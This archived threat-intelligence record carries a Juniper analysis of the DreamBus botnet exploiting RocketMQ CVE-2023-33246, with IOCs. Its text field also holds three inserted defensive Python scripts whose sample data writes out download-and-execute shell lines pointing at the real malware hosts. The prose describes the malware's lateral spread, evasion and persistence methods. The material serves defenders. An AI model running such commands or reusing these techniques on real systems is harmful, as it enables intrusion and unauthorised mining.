{
	"id": "57adf11b-286c-4d4e-84ff-3542143c45df",
	"created_at": "2026-04-06T01:31:37.196288Z",
	"updated_at": "2026-04-10T03:24:18.126025Z",
	"deleted_at": null,
	"sha1_hash": "7cb22a620b8d7f6bb40d570c5b7e4188e316a682",
	"title": "DreamBus Botnet Resurfaces, Targets RocketMQ vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1447003,
	"plain_text": "DreamBus Botnet Resurfaces, Targets RocketMQ vulnerability\r\nBy Paul Kimayong\r\nPublished: 2023-08-28 · Archived: 2026-04-06 00:39:42 UTC\r\nIn May 2023, a vulnerability affecting RocketMQ servers (CVE-2023-33246), which allows remote code\r\nexecution, was publicly disclosed. In a recent blog post, Juniper Threat Labs provided a detailed explanation of\r\nhow an exploit targeting this vulnerability works.\r\nThis vulnerability opened the gates for attackers to exploit the RocketMQ platform, leading to a series of attacks. In\r\nfact, Juniper Threat Labs has detected multiple attacks where threat actors took advantage of the vulnerability to\r\ninfiltrate systems and subsequently install the DreamBus bot, a malware strain last seen in 2021.\r\nIn this blog post, we delve into the details of the attacks and the bot.\r\nAttack Timeline\r\nIn early June, as shown in Fig. 1, we began seeing attacks targeting this RocketMQ vulnerability. The\r\nattacks reached a peak in volume towards mid-June. While the default port for RocketMQ is 10911 (depicted in\r\ngreen in Fig. 1), it is worth noting that the attacks targeted at least seven other ports, so detection keyed to port 10911 alone would miss them.\r\nhttps://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability\r\nPage 1 of 11\n\nFig. 1: Timeline of Recent RocketMQ attacks Observed by Juniper Threat Labs.\r\nInterestingly, the initial attacks were non-destructive in nature. Rather than do damage, the threat actors\r\nemployed ‘interactsh’, an open-source out-of-band interaction tool, to confirm which servers were exploitable: the exploited server calls back to a public interactsh server, so the attackers can probe without exposing any infrastructure of their own. This method\r\nallows them to collect valuable reconnaissance data before committing a payload.\r\nFig. 2: Attacks employing interactsh.\r\nFig. 
3: Webpage of one interactsh server describing the tool.\r\nStarting on June 19th, we detected a series of attacks that involved downloading and executing a malicious bash\r\nscript named “reketed”. On that same day, we observed threat actors using two\r\ndifferent methods to retrieve and execute this script. In one (refer to Fig. 4 below), the threat\r\nactors fetched it through the Tor2web gateway “tor2web.in”, which relays Tor hidden-service content over ordinary HTTP. (Using such a gateway lets the payload be pulled from a .onion address with an ordinary HTTP client, without any Tor client on the victim’s system; it also means the download appears in proxy logs as a request to the gateway rather than to an onion address.) In the other, the attackers retrieved and\r\nexecuted the “reketed” payload from the IP address 92[.]204.243.155 on port 8080 (refer to\r\nFig. 5 below).\r\nFig. 4: Attack directly using TOR proxy service tor2web.in to download the payload.\r\nFig. 5: Attack showing threat actors using IP address 92[.]204.243.155 to download the payload.\r\nReketed: Downloader Bash Script\r\nUpon successful exploitation, the payload executes the bash script named ‘reketed’ (SHA-256:\r\n1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047). At the time of our\r\nanalysis here at Juniper Threat Labs, this file had no detections in VirusTotal (VT), as shown in Fig. 6.\r\nFig. 6: VT shows zero (0) anti-malware vendors detected the malicious “reketed” bash script.\r\nThe primary function of the reketed bash script is to download the DreamBus main module from a TOR\r\nhidden service, “ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion”. When run, the\r\nscript downloads the DreamBus main module, which is an ELF binary, and\r\ninstalls it. 
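The two retrieval paths described above (the Tor2web gateway and the direct 92[.]204.243.155:8080 download) are easy to pick out of command-line audit or proxy logs. What follows is an added example written for this page, not code from the original post or from the malware: it classifies every URL found in a log line against the indicators named here. The sample log lines and the <onion>.tor2web.in URL shape are constructed for illustration; real gateway URL formats vary, so extend TOR2WEB_GATEWAYS from your own observations.

```python
import re
from urllib.parse import urlsplit

# Indicators from this post (defanged in the text; real form here so they match).
DOWNLOAD_IP = '92.204.243.155'
DOWNLOAD_PORT = 8080
ONION = 'ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion'
# Tor2web gateway named in the post; other gateways are an assumption, add as observed.
TOR2WEB_GATEWAYS = ('tor2web.in',)

# Whitelist of URL characters; stops at whitespace and shell metacharacters.
URL_RE = re.compile(r'https?://[A-Za-z0-9._:/?&=%@-]+')


def classify_url(url):
    '''Return the list of reasons a URL matches the post's IOCs (empty if none).'''
    parts = urlsplit(url)
    host = (parts.hostname or '').lower()
    reasons = []
    if host == DOWNLOAD_IP:
        reasons.append('download server ' + DOWNLOAD_IP)
        if parts.port == DOWNLOAD_PORT:
            reasons.append('port 8080 as in the observed exploit')
    if host == ONION:
        reasons.append('DreamBus onion service')
    for gw in TOR2WEB_GATEWAYS:
        if host == gw or host.endswith('.' + gw):
            reasons.append('Tor2web gateway ' + gw)
    # Gateway URLs carry the onion name inside the hostname or path; catch that too.
    if host != ONION and ONION.split('.')[0] in url.lower():
        reasons.append('onion address of the DreamBus C2 embedded in URL')
    return reasons


def scan_lines(lines):
    '''Return (line_number, url, reasons) for every IOC hit in the given log lines.'''
    hits = []
    for n, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            reasons = classify_url(url)
            if reasons:
                hits.append((n, url, reasons))
    return hits


# Constructed sample lines modelled on what Fig. 4 and Fig. 5 describe (not the post's captures).
SAMPLE_LINES = [
    'auditd: execve curl -fsSL http://92.204.243.155:8080/reketed -o /tmp/.x',
    'proxy: GET http://ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.in/reketed',
    'proxy: GET https://updates.example.org/ubuntu/pool/main/c/curl/curl_8.deb',
]

if __name__ == '__main__':
    for n, url, reasons in scan_lines(SAMPLE_LINES):
        print(n, url, '; '.join(reasons))
```

Matching on the gateway hostname matters because a proxy never sees the .onion name in the Host header; only the path or subdomain carries it.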
The script assigns it a 20-character filename: the first 20\r\ncharacters of the 32-character MD5 hex digest of the output of date (i.e., date|md5sum|head -c20). Because date includes the time of day, the name differs on every run, so the name itself is not a stable indicator; the 20-lowercase-hex-character pattern is.\r\nThe reketed bash script exhibits some obfuscation, with randomized names assigned to\r\nfunctions and variables. After renaming the variables, however, the script becomes intelligible and readily\r\nanalyzed. See the contents of the reketed script after deobfuscation in Fig. 7 below.\r\nOnce the DreamBus main module is downloaded, the “reketed” script promptly executes the ELF binary\r\nand then deletes it from disk, adding a layer of complexity to forensic investigation. (The running process still holds the unlinked file, so it can be recovered and hashed through /proc/<pid>/exe until the process exits.)\r\nFig. 7: Reketed script after fixing the structure and renaming the variables.\r\nDreamBus Main Module\r\nThe sha256sum of the downloaded main module is\r\n601a2ff4a7244ed41dda1c1fc71b10d3cfefa34e2ef8ba71598f41f73c031443. At the time of our analysis, the\r\nDreamBus main module, like the reketed shell script, showed no detections in VirusTotal\r\n(as shown in Fig. 8 below).\r\nThe DreamBus main module is an ELF Linux binary packed with UPX, but with modified headers\r\nand footers that make unpacking more challenging. With this simple trick, the out-of-the-box UPX tool cannot unpack it (refer to Fig. 9 below). This also hampers static detection, as engines\r\ntypically need to unpack UPX-packed samples before scanning. For this file, restoring the\r\nUPX headers proved sufficient for the UPX tool to unpack it.\r\nFig. 
8: VT shows zero (0) anti-malware vendors detected the DreamBus main module ELF file.\r\nFig. 9: Modified UPX header of the ELF binary.\r\nAfter unpacking, static analysis of the DreamBus main module binary showed that it executes\r\nnumerous base64-encoded strings. These encoded strings (refer to Fig. 10 and Fig. 11 below) are shell scripts with\r\ndifferent functionalities, including downloading other malicious modules. We provide more details on these\r\nlater in this blog post.\r\nFig. 10: Snippet of code executing the base64-encoded shell scripts in the Linux binary.\r\nFig. 11: Base64-encoded shell scripts in the Linux binary.\r\nThese base64-encoded strings decode into bash scripts resembling the “reketed” script described earlier in this\r\nblog post. The scripts can perform various functions, such as downloading other modules, by sending requests to\r\nthe TOR onion service using different path names. For instance, the bot can send requests to the following paths:\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion/ping\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion/mine\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion/cmd1\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion/kill\r\nDuring our analysis, we identified several capabilities possessed by the malware. 
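Because the bot wraps its scripts in base64, the request paths above can be recovered statically from the unpacked binary without running it. As an added example (written for this page, not the post's own tooling), the following carves long base64 runs out of a byte buffer, decodes the ones that look like shell scripts, and lists the onion host and path pairs they reference. The sample buffer is constructed here as a stand-in for an unpacked sample; the 40-character minimum run length and the script heuristics are assumptions to tune against real samples.

```python
import base64
import re

# Embedded scripts show up as long base64 runs; 40+ chars keeps ordinary symbols out.
B64_RUN = re.compile(rb'[A-Za-z0-9+/]{40,}={0,2}')
# v3 onion names are 56 base32 characters; capture the request path that follows.
ONION_PATH = re.compile(rb'([a-z2-7]{56})[.]onion(/[A-Za-z0-9_./-]*)?')


def carve_scripts(blob):
    '''Decode every long base64 run in blob; keep only payloads that look like shell scripts.'''
    scripts = []
    for m in B64_RUN.finditer(blob):
        run = m.group(0)
        run += b'=' * (-len(run) % 4)  # tolerate stripped padding
        try:
            data = base64.b64decode(run, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if data.startswith(b'#!') or b'curl ' in data or b'wget ' in data:
            scripts.append((m.start(), data))
    return scripts


def c2_paths(scripts):
    '''Collect distinct (onion host, path) pairs referenced by the carved scripts.'''
    found = set()
    for _, data in scripts:
        for host, path in ONION_PATH.findall(data):
            found.add((host.decode() + '.onion', (path or b'/').decode()))
    return sorted(found)


# Constructed stand-in for an unpacked binary: junk bytes around two base64-wrapped scripts.
NL = bytes([10])
ONION_HOST = b'ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion'
SCRIPT_1 = NL.join([b'#!/bin/bash',
                    b'curl -s http://' + ONION_HOST + b'/ping',
                    b'curl -s http://' + ONION_HOST + b'/mine -o /tmp/m'])
SCRIPT_2 = NL.join([b'#!/bin/bash',
                    b'wget -qO- http://' + ONION_HOST + b'/cmd1 | bash'])
SAMPLE_BINARY = (bytes([0x7f]) + b'ELF' + bytes(range(256))
                 + b'echo ' + base64.b64encode(SCRIPT_1) + b' | base64 -d | bash'
                 + bytes(range(255, 0, -1)) + base64.b64encode(SCRIPT_2) + bytes(64))

if __name__ == '__main__':
    found = carve_scripts(SAMPLE_BINARY)
    for offset, data in found:
        print('script at offset', offset, 'length', len(data))
    for host, path in c2_paths(found):
        print(host + path)
```

Running the carver over the real unpacked module and diffing the recovered path set against the table of capabilities is a quick way to spot request paths (such as /scan) that the sample can issue but that were not exercised during dynamic analysis.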
Upon executing each capability,\r\nit sends a corresponding request to the server, notifying it of the action taken.\r\nRequest Description\r\n{onion site}/ping Beacon out to the server advertising that it is alive\r\n{onion site}/exec Download and execute main module\r\n{onion site}/mine Download and install a Monero miner\r\n{onion site}/cmd1 Execute bash script\r\n{onion site}/cmd2 Execute a bash script while including in the request the machine ID, IP and hostname\r\n{onion site}/kill Notify the server that older versions of the bot were terminated and removed\r\nAs part of the installation routine, the malware terminates processes and deletes files associated with outdated\r\nversions of itself. It then sends a request to {onion site}/kill to notify the server of this action.\r\nSpreader\r\nThe DreamBus main module also requests other paths, such as one ending in /scan, which we could not\r\nverify because the request returned nothing at the time of our analysis. DreamBus expects this request to return a\r\nfile which it will install and execute. We believe this module scans a set of external and internal IP ranges and\r\nspreads via exploits, as seen in previous DreamBus variants.\r\nFurthermore, the DreamBus bot spreads laterally. The threat actors leverage widely used\r\nIT automation tools such as ansible, knife, salt and pssh (parallel ssh), pushing a Base64-encoded string\r\nof shell commands to the remote systems those tools already manage, which installs the DreamBus main module there.\r\nAdditionally, this function extracts hosts from the user’s bash_history, the /etc/hosts file and the ssh known_hosts file,\r\nfurther aiding the spread of the malware. Any account whose automation credentials or SSH keys reach other hosts therefore turns one compromised RocketMQ server into a foothold on every host it can manage.\r\nFig. 
12: Snippet of code showing how the malware spreads using IT automation tools and SSH.\r\nMonero Miner\r\nRequesting the /mine path on\r\n“ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion”\r\nreturned the open-source Monero cryptocurrency miner XMRig. The XMRig file’s sha256sum is\r\n1c49d7da416474135cd35a9166f2de0f8775f21a27cd47d28be48a2ce580d58d. As with the DreamBus\r\nbinary, this XMRig build is packed with UPX with modified headers. Once unpacked, the binary reveals its hardcoded\r\nconfiguration (refer to Fig. 13 below), which includes joining the mining pool ‘p2pool.it’ for Monero\r\nmining. The binary uses the username ‘x’ and password ‘x’ for authentication\r\nwith the pool.\r\nFig. 13: Configuration of XMRig Monero cryptocurrency miner.\r\nPersistence\r\nTo ensure a persistent presence, the malware employs multiple mechanisms. First, it creates a user-level systemd service unit at\r\n$HOME/.config/systemd/user/systemd-tmpfiles-cleanup, a name chosen to resemble the legitimate system-wide systemd-tmpfiles-clean service. Then a timer unit (refer to Fig.\r\n14 below) is installed, scheduled to start the above service hourly. Furthermore, a cron job (refer to Fig. 15\r\nbelow) is created to execute the downloader script with the same hourly frequency. Because both live in the user’s own systemd directory and crontab, they need no root privileges, and the hourly re-download restores the bot if the running copy is killed or its files are removed.\r\nFig. 14: Snippet of code that creates Timer service for persistence.\r\nFig. 15: Snippet of code that creates cron job.\r\nConclusion\r\nAs DreamBus malicious threat actors resurface, their primary objective remains the installation of a Monero\r\ncryptocurrency miner. 
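Pulling together the host artifacts described in this post (the execute-then-delete downloader, the 20-hex-character filename, the user-level systemd-tmpfiles-cleanup unit and timer, the hourly cron job, and the IOC hashes), here is an added triage script written for this page rather than Juniper's tooling or the malware's code. scan_proc needs root to read other users' /proc/<pid>/exe links; demo() exercises the same checks on constructed evidence only, so it runs anywhere.

```python
import hashlib
import os
import re
import tempfile

HEX20 = re.compile(r'^[0-9a-f]{20}$')  # date|md5sum|head -c20 naming from the post
# SHA-256 values from the post's IOC table.
IOC_SHA256 = {
    '601a2ff4a7244ed41dda1c1fc71b10d3cfefa34e2ef8ba71598f41f73c031443': 'DreamBus bot',
    '1c49d7da416474135cd35a9166f2de0f8775f21a27cd47d28be48a2ce580d58d': 'XMRig miner',
    '1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047': 'reketed downloader',
}
UNIT = 'systemd-tmpfiles-cleanup'  # user unit name from the post; mimics systemd-tmpfiles-clean


def looks_like_dropper_name(name):
    return bool(HEX20.match(name))


def check_process(pid, exe_target, exe_bytes):
    '''Classify one process from its /proc/<pid>/exe link target and the bytes read through it.'''
    digest = hashlib.sha256(exe_bytes).hexdigest()
    findings = []
    if exe_target.endswith(' (deleted)'):
        findings.append('executable deleted while running; recovered %d bytes via /proc/%d/exe'
                        % (len(exe_bytes), pid))
    base = os.path.basename(exe_target.replace(' (deleted)', ''))
    if looks_like_dropper_name(base):
        findings.append('20-hex-char executable name matches the reketed naming scheme')
    if digest in IOC_SHA256:
        findings.append('sha256 matches IOC: ' + IOC_SHA256[digest])
    return digest, findings


def scan_proc(proc_root='/proc'):
    '''Walk live processes; the unlinked binary is still readable through the exe link.'''
    results = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        exe = os.path.join(proc_root, entry, 'exe')
        try:
            target = os.readlink(exe)
            with open(exe, 'rb') as fh:
                data = fh.read()
        except OSError:
            continue  # kernel threads, vanished or unreadable processes
        results[int(entry)] = check_process(int(entry), target, data)
    return results


def check_persistence(home, crontab_text):
    '''Look for the user systemd unit/timer and hourly cron downloader described in the post.'''
    findings = []
    unit_dir = os.path.join(home, '.config', 'systemd', 'user')
    for suffix in ('.service', '.timer'):
        path = os.path.join(unit_dir, UNIT + suffix)
        if os.path.exists(path):
            findings.append('user unit present: ' + path)
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        fields = line.split()
        hourly = line.startswith('@hourly') or (
            len(fields) >= 6 and fields[0].isdigit() and fields[1:5] == ['*', '*', '*', '*'])
        if hourly and any(tok in line for tok in ('curl', 'wget', '.onion', 'tor2web')):
            findings.append('hourly cron downloader: ' + line)
    return findings


def demo():
    '''Constructed evidence (not from a real host): unit files, a cron line, a deleted 20-hex exe.'''
    with tempfile.TemporaryDirectory() as home:
        unit_dir = os.path.join(home, '.config', 'systemd', 'user')
        os.makedirs(unit_dir)
        for suffix in ('.service', '.timer'):
            with open(os.path.join(unit_dir, UNIT + suffix), 'w') as fh:
                fh.write('[Unit]' + chr(10))
        crontab = ('# m h dom mon dow command' + chr(10)
                   + '0 * * * * curl -s http://tor2web.in/x | bash' + chr(10))
        persistence = check_persistence(home, crontab)
    # A process whose binary was unlinked after exec carries the (deleted) marker on its link.
    _, proc_findings = check_process(4242, '/tmp/3f1a9c0e5b2d7a8f6e4c (deleted)', b'not-a-real-binary')
    return persistence, proc_findings

if __name__ == '__main__':
    print(demo())
```

On a live host, run scan_proc as root and act on a deleted-exe finding before killing the process: once it exits, the unlinked binary is gone and only the hash you already recorded remains.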
However, the presence of a modular bot like DreamBus, with the\r\nability to execute arbitrary bash scripts, gives these cybercriminals the potential to diversify their attack repertoire,\r\nincluding the installation of other forms of malware. Their preferred means of initial access is\r\nexploiting vulnerabilities, particularly recent ones that yield remote code execution, like the RocketMQ\r\nvulnerability CVE-2023-33246. To protect organizations from DreamBus malware, RocketMQ exploitation and similar\r\nattacks, Juniper highly recommends implementing robust patch management processes to ensure that\r\nvulnerable systems are updated in a timely manner and protected against these and an evolving set of malicious\r\nthreats.\r\nJuniper ATP Cloud detects this malware using machine learning based on static and behavioral analysis.\r\nJuniper SRX customers with an IDP license are protected against this RocketMQ vulnerability by the signature\r\nbelow (released with IDP sigpack #3604):\r\nTCP:C2S:APACHE-ROCKETMQ-UPDT-CE\r\nIndicators of Compromise\r\nIndicator Description\r\n92[.]204.243.155 Download server (port 8080)\r\nru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad[.]onion Download and control server\r\n1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047 Bash script downloader (reketed)\r\n1c49d7da416474135cd35a9166f2de0f8775f21a27cd47d28be48a2ce580d58d XMRig Miner\r\n601a2ff4a7244ed41dda1c1fc71b10d3cfefa34e2ef8ba71598f41f73c031443 DreamBus Bot (main module)\r\n153b0d0916bd3150c5d4ab3e14688140b34fdd34caac725533adef8f4ab621e2 DreamBus Bot\r\ne71caf456b73dade7c65662ab5cf55e02963ee3f2bfb47e5cffc1b36c0844b4d DreamBus Bot\r\n9f740c9042a7c3c03181d315d47986674c50c2fca956915318d7ca9d2a086b7f DreamBus Bot\r\n371319cd17a1ab2d3fb2c79685c3814dc24d67ced3e2f7663806e8960ff9334c DreamBus 
Bot\r\n21a9f094eb65256e0ea2adb5b43a85f5abfbfdf45f855daab3eb6749c6e69417 DreamBus Bot\r\n0a8779a427aba59a66338d85e28f007c6109c23d6b0a6bd4b251bf0f543a029f DreamBus Bot\r\nSource: https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.juniper.net/en-us/threat-research/dreambus-botnet-resurfaces-targets-rocketmq-vulnerability"
	],
	"report_names": [
		"dreambus-botnet-resurfaces-targets-rocketmq-vulnerability"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439097,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7cb22a620b8d7f6bb40d570c5b7e4188e316a682.pdf",
		"text": "https://archive.orkl.eu/7cb22a620b8d7f6bb40d570c5b7e4188e316a682.txt",
		"img": "https://archive.orkl.eu/7cb22a620b8d7f6bb40d570c5b7e4188e316a682.jpg"
	}
}